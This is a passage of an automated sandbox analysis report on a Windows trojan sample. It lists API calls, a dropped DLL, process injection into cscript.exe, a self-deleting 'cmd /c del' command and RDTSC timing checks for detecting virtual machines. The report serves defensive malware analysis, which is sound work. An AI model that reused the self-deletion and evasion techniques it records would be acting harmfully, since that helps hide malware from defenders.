          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_0041BDD0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_0041CF88
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B320A0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD20A8
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B1B090
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD28EC
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BDE824
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BC1002
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B24120
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B0F900
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD22AE
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3EBB0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BC03DA
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BCDBD2
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD2B28
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B1841F
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BCD466
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B32581
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B1D5E0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD25DD
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B00D20
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD2D07
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD1D55
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD2EF7
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B26E30
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BCD616
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD1FF1
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BDDFCE
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_00401030
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_00401175
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_0041C997
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_0041BB46
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_0041CBF5
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_00408C3A
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_00408C80
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_0041C48C
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_0041BDD0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_00402D90
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_0041CF88
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_00402FB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E1D55
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E2D07
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05410D20
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E25DD
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0542D5E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05442581
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054DD466
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0542841F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054EDFCE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E1FF1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054DD616
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05436E30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E2EF7
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541F900
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05434120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1002
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054EE824
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543A830
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E28EC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0542B090
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054420A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E20A8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543AB40
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E2B28
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D03DA
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054DDBD2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544EBB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054CFA2B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E22AE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0123C997
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0123CBF5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_01222D90
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_01228C3A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_01228C80
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_01222FB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0123CF88
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: String function: 0041A390 appears 38 times
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: String function: 0041A4C0 appears 38 times
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: String function: 00B0B150 appears 39 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0541B150 appears 66 times
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_004185E0 NtCreateFile,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00418690 NtReadFile,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00418710 NtClose,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_004187C0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_004185DA NtCreateFile,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B498F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B499A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B495D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B496E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B497A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B498A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B4B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B499D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49A10 NtQuerySection,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B4A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B495F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B4AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49560 NtWriteFile,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B496D0 NtCreateKey,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B4A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B4A770 NtOpenThread,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49760 NtOpenProcess,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_004185E0 NtCreateFile,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_00418690 NtReadFile,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_00418710 NtClose,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_004187C0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_004185DA NtCreateFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054595D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054596D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054596E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054599A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0545AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054595F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0545A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0545A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054597A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054599D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0545B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054598F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054598A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0545A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_012385E0 NtCreateFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_01238710 NtClose,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_012387C0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_01238690 NtReadFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_012385DA NtCreateFile,
          Source: Y1p8VPvyU2.exe, 00000000.00000003.302983969.0000000002D1F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Y1p8VPvyU2.exe
          Source: Y1p8VPvyU2.exe, 00000000.00000003.304611103.0000000002B86000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Y1p8VPvyU2.exe
          Source: Y1p8VPvyU2.exe, 00000001.00000002.361796022.0000000000A60000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamecscript.exe` vs Y1p8VPvyU2.exe
          Source: Y1p8VPvyU2.exe, 00000001.00000002.362160211.0000000000D8F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Y1p8VPvyU2.exe
          Source: Y1p8VPvyU2.exe, 00000001.00000002.362000992.0000000000BFF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Y1p8VPvyU2.exe
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsj1052.tmp\msvofdls.dll 13FA843E8D2B2E3A9699F9F71A8AD152EA94995B1045891B6B91CFA9674B69F8
          Source: Y1p8VPvyU2.exeVirustotal: Detection: 35%
          Source: Y1p8VPvyU2.exeReversingLabs: Detection: 64%
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeFile read: C:\Users\user\Desktop\Y1p8VPvyU2.exeJump to behavior
          Source: Y1p8VPvyU2.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\Y1p8VPvyU2.exe "C:\Users\user\Desktop\Y1p8VPvyU2.exe"
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeProcess created: C:\Users\user\Desktop\Y1p8VPvyU2.exe "C:\Users\user\Desktop\Y1p8VPvyU2.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Y1p8VPvyU2.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeProcess created: C:\Users\user\Desktop\Y1p8VPvyU2.exe "C:\Users\user\Desktop\Y1p8VPvyU2.exe"
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Y1p8VPvyU2.exe"
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeFile created: C:\Users\user\AppData\Local\Temp\nso1022.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/2@7/3
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_00402012 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_0040411B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2332:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Binary string: cscript.pdbUGP source: Y1p8VPvyU2.exe, 00000001.00000002.361796022.0000000000A60000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: Y1p8VPvyU2.exe, 00000000.00000003.303889590.0000000002C00000.00000004.00000001.sdmp, Y1p8VPvyU2.exe, 00000000.00000003.304490729.0000000002A70000.00000004.00000001.sdmp, Y1p8VPvyU2.exe, 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Y1p8VPvyU2.exe, 00000001.00000002.362000992.0000000000BFF000.00000040.00000001.sdmp, cscript.exe, 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp, cscript.exe, 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Y1p8VPvyU2.exe, Y1p8VPvyU2.exe, 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Y1p8VPvyU2.exe, 00000001.00000002.362000992.0000000000BFF000.00000040.00000001.sdmp, cscript.exe, cscript.exe, 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp, cscript.exe, 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp
          Source: Binary string: cscript.pdb source: Y1p8VPvyU2.exe, 00000001.00000002.361796022.0000000000A60000.00000040.00020000.sdmp
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10023581 push eax; ret
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10023600 push eax; ret
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10013245 push ecx; ret
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_0041B822 push eax; ret
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_0041B82B push eax; ret
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_0041B88C push eax; ret
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00415094 push ds; iretd
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_0041A269 push ebx; retf
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_004044C6 push eax; retf
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_0041B7D5 push eax; ret
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B5D0D1 push ecx; ret
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_0041B822 push eax; ret
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_0041B82B push eax; ret
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_0041B88C push eax; ret
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_00415094 push ds; iretd
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_0041A269 push ebx; retf
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_004044C6 push eax; retf
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_0041B7D5 push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0546D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0123B822 push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0123B82B push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0123B88C push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_01235094 push ds; iretd
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0123A269 push ebx; retf
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_012244C6 push eax; retf
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0123C750 push es; iretd
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0123B7D5 push eax; ret
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: Y1p8VPvyU2.exeStatic PE information: real checksum: 0x0 should be: 0x5d471
          Source: msvofdls.dll.0.drStatic PE information: real checksum: 0x30354 should be: 0x25b81
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeFile created: C:\Users\user\AppData\Local\Temp\nsj1052.tmp\msvofdls.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: /c del "C:\Users\user\Desktop\Y1p8VPvyU2.exe"
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: /c del "C:\Users\user\Desktop\Y1p8VPvyU2.exe"
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeRDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 0000000001228604 second address: 000000000122860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 000000000122899E second address: 00000000012289A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exe TID: 6672Thread sleep time: -38000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_004088D0 rdtsc
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_00405C22 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_00402630 FindFirstFileA,
